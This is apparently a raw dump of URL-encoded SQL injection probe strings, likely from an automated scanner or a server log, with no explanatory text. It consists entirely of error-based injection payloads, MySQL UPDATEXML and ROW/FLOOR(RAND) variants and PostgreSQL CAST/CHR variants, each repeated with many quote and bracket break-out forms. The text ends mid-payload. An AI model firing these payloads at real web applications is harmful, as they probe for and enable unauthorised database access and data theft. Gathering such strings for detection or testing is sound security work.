1%22%29%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%28%22XgrB%22%3D%22XgrB 1%22%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%22anMe%22%3D%22anMe 1%22%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%22Jron%22%20LIKE%20%22Jron 1%22%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%22wjXm%22%20LIKE%20%22wjXm 1%22%29%29%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%28%28%28%22nQHi%22%20LIKE%20%22nQHi 1%22%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20AND%20%22BpeC%22%20LIKE%20%22BpeC 1%29%20WHERE%208531%3D8531%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%29%20WHERE%204134%3D4134%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%20WHERE%201174%3D1174%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%22%20WHERE%208586%3D8586%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29 1%27%20%7C%7C%20%28SELECT%205722%20FROM%20DUAL%20WHERE%208833%3D8833%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202970%20WHERE%207061%3D7061%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201891%20FROM%20DUAL%20WHERE%202222%3D2222%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29 1%20%2B%20%28SELECT%203484%20WHERE%201191%3D1191%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29 1%27%20%2B%20%28SELECT%20%27XeSF%27%20FROM%20DUAL%20WHERE%203560%3D3560%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27oSjB%27%20WHERE%202664%3D2664%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%281167%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281167%3D1167%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C4486%29%20%23 1%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%22%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%287124%3D7124 1%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%283685%3D3685 1%29%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%287213%3D7213 1%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27JJov%27%3D%27JJov 1%27%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27FMtd%27%3D%27FMtd 1%27%29%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27PujU%27%3D%27PujU 1%27%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27eUtj%27%3D%27eUtj 1%27%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%27xtTB%27%20LIKE%20%27xtTB 1%27%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%27pgUE%27%20LIKE%20%27pgUE 1%27%29%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%27FYdS%27%20LIKE%20%27FYdS 1%27%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%27Ytqp%27%20LIKE%20%27Ytqp 1%22%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22KMiK%22%3D%22KMiK 1%22%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22CJKg%22%3D%22CJKg 1%22%29%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22yuKi%22%3D%22yuKi 1%22%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22VoPW%22%3D%22VoPW 1%22%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%22nMzt%22%20LIKE%20%22nMzt 1%22%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%22KLhL%22%20LIKE%20%22KLhL 1%22%29%29%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22mIGZ%22%20LIKE%20%22mIGZ 1%22%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22OINH%22%20LIKE%20%22OINH 1%29%20WHERE%209181%3D9181%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%29%20WHERE%201965%3D1965%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%20WHERE%205257%3D5257%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%22%20WHERE%201841%3D1841%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29 1%27%20%7C%7C%20%28SELECT%208012%20FROM%20DUAL%20WHERE%208177%3D8177%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208584%20WHERE%207349%3D7349%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203271%20FROM%20DUAL%20WHERE%204716%3D4716%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 1%20%2B%20%28SELECT%204431%20WHERE%202138%3D2138%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29 1%27%20%2B%20%28SELECT%20%27yCqN%27%20FROM%20DUAL%20WHERE%203780%3D3780%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BAaF%27%20WHERE%207681%3D7681%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%281870%2C6010%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%281870%3D1870%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201870%20UNION%20SELECT%206010%29a%20GROUP%20BY%20x%20LIMIT%201%29%20%23 1%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%22%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%286605%3D6605 1%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%281718%3D1718 1%29%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%286429%3D6429 1%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27FreC%27%3D%27FreC 1%27%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27zton%27%3D%27zton 1%27%29%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27YNsx%27%3D%27YNsx 1%27%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27XXDE%27%3D%27XXDE 1%27%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27Aryp%27%20LIKE%20%27Aryp 1%27%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27rNCg%27%20LIKE%20%27rNCg 1%27%29%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27hmVe%27%20LIKE%20%27hmVe 